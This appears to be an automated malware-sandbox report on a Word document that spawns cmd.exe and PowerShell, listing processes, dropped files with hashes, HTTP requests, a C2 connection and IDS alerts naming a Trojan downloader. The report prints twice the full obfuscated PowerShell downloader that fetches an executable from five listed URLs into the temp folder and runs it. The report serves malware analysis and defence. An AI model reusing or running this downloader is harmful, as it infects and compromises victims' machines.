2640C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $u5844='d1794';$h9410=new-object Net.WebClient;$k3609='http://ahluniversity.com/lW8Z9O0kOlt@http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu@http://ptof.club/wcy1UGRiD991_fsn@http://airconpro.co.za/YfhHLpgsKJ0v_Fde@http://schapenbedrijf.nl/e8eGE3bFrc80tWMb'.Split('@');$j3794='o6522';$v4337 = '269';$u4407='a4499';$s8986=$env:temp+'\'+$v4337+'.exe';foreach($o5176 in $k3609){try{$h9410.DownloadFile($o5176, $s8986);$m1861='d1965';If ((Get-Item $s8986).length -ge 40000) {Invoke-Item $s8986;$w1514='m1598';break;}}catch{}}$p8366='b3451';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2760cmdC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3172powershell $u5844='d1794';$h9410=new-object Net.WebClient;$k3609='http://ahluniversity.com/lW8Z9O0kOlt@http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu@http://ptof.club/wcy1UGRiD991_fsn@http://airconpro.co.za/YfhHLpgsKJ0v_Fde@http://schapenbedrijf.nl/e8eGE3bFrc80tWMb'.Split('@');$j3794='o6522';$v4337 = '269';$u4407='a4499';$s8986=$env:temp+'\'+$v4337+'.exe';foreach($o5176 in $k3609){try{$h9410.DownloadFile($o5176, $s8986);$m1861='d1965';If ((Get-Item $s8986).length -ge 40000) {Invoke-Item $s8986;$w1514='m1598';break;}}catch{}}$p8366='b3451';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3504"C:\Users\admin\AppData\Local\Temp\269.exe" C:\Users\admin\AppData\Local\Temp\269.exepowershell.exe
User:
admin
Company:
Microsoft Corp
Integrity Level:
MEDIUM
Description:
Canadian M
Exit code:
0
Version:
3.0.69
2468"C:\Users\admin\AppData\Local\Temp\269.exe"C:\Users\admin\AppData\Local\Temp\269.exe
269.exe
User:
admin
Company:
Microsoft Corp
Integrity Level:
MEDIUM
Description:
Canadian M
Exit code:
0
Version:
3.0.69
296"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe269.exe
User:
admin
Company:
Microsoft Corp
Integrity Level:
MEDIUM
Description:
Canadian M
Exit code:
0
Version:
3.0.69
2824"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corp
Integrity Level:
MEDIUM
Description:
Canadian M
Version:
3.0.69
Total events
1 790
Read events
1 308
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2976WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE8FC.tmp.cvr
MD5:
SHA256:
2976WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15537A9C.jpg
MD5:
SHA256:
3172powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ETA1VRVI8LW1303ZQQ7R.temp
MD5:
SHA256:
3172powershell.exeC:\Users\admin\AppData\Local\Temp\269.exe
MD5:
SHA256:
3172powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2976WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:E06109969FEBE50C3AE71B5B04150D54
SHA256:347F2E6A51A90F23672DD1432113232728893CF9AC1E28D88F701F2A6A923FCE
2976WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:5668E0BECA7260FE57640A54FBAEC98C
SHA256:F31166347156B1F55AC9D8543E3751068AAE8BB7A649F271617CCF59E1E3BEBA
2468269.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:69A348DF3D2DD26C01B0D943014A3681
SHA256:E2336EB2A1DB7A170E0790DC5A0E1F0CF9CEDD76EAB4842AD7424A5CFA3CB569
2976WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$616586598.docpgc
MD5:BA8DFD296864750F0DB790346614E69E
SHA256:ED78B104B33BDD32D3E811C2402ACC901A802A24C95C510C28A87487B9DE3399
3172powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f90a.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
3
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3172
powershell.exe
GET
301
192.185.52.164:80
http://ahluniversity.com/lW8Z9O0kOlt
US
html
312 b
malicious
3172
powershell.exe
GET
200
192.185.52.164:80
http://ahluniversity.com/lW8Z9O0kOlt/
US
html
506 b
malicious
3172
powershell.exe
GET
301
192.185.20.9:80
http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu
US
html
339 b
suspicious
3172
powershell.exe
GET
200
192.185.20.9:80
http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu/
US
executable
545 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2824
wabmetagen.exe
182.176.106.43:995
Pakistan Telecom Company Limited
PK
malicious
3172
powershell.exe
192.185.52.164:80
ahluniversity.com
CyrusOne LLC
US
malicious
3172
powershell.exe
192.185.20.9:80
www.megafighton.sandboxph.com
CyrusOne LLC
US
suspicious

DNS requests

Domain
IP
Reputation
ahluniversity.com
  • 192.185.52.164
malicious
www.megafighton.sandboxph.com
  • 192.185.20.9
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
3172
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3172
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3172
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3172
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3172
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info